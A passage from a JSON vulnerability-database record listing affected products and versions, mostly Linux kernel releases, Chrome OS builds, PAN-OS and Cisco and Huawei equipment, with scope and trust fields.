      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.152"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "ar3200 v200r006c13",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel 3.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.1"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59207)0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.7"
      },
      {
        "model": "smart net total care onprem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.54"
      },
      {
        "model": "update hotfix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "virtuozzo",
        "version": "6.011"
      },
      {
        "model": "cloudengine v100r005c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5"
      },
      {
        "model": "powerkvm update",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.1.3-6513"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "spa112 2-port phone adapter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos space 16.1r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.161"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "fusioncube v100r002c60rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "ar3200 v200r006c12",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.23"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.43"
      },
      {
        "model": "hsr6800 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.94"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "powerkvm update",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1185.0"
      },
      {
        "model": "manager proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.91"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.46"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel 3.7-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "cloudengine v100r005c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.19"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.10.140.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.01"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.28"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.8"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.134.14"
      },
      {
        "model": "ata analog telephone adaptor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1870"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.76"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "expressway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.21"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.1"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.15"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.79"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.74"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.131.0"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3000"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.63"
      },
      {
        "model": "ar3200 v200r007c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "cloudengine v100r003c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "cloudengine v200r001sph002",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "vds-tv caching nodes",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "helion openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.19"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.20"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.55"
      },
      {
        "model": "openstack cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.12"
      },
      {
        "model": "helion openstack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.0.1"
      },
      {
        "model": "ar3200 v200r006c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "series digital media players",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "43000"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.82"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.55"
      },
      {
        "model": "linux enterprise server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.90"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.3"
      },
      {
        "model": "linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1185.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5(.1.6)"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.0"
      },
      {
        "model": "kernel 3.14-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel 4.3-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.126.0"
      },
      {
        "model": "kernel 4.1-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.3"
      },
      {
        "model": "cloudengine v100r005c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.01"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1"
      },
      {
        "model": "server bare metal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "virtuozzo",
        "version": "5.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.159"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.68"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.20"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.24"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.30"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.50"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "5"
      },
      {
        "model": "nexus series fabric switches aci mode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9000-0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.84"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "cloudengine v100r006c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.173"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1185.1"
      },
      {
        "model": "manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.45"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.44"
      },
      {
        "model": "helion openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "5130hi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "linux enterprise debuginfo sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "propel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.10"
      },
      {
        "model": "helion cloudsystem",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "nexus player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.20"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.126"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.26"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.21"
      },
      {
        "model": "cloud object storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.4"
      },
      {
        "model": "junos space 14.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.7"
      },
      {
        "model": "kernel 4.1-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
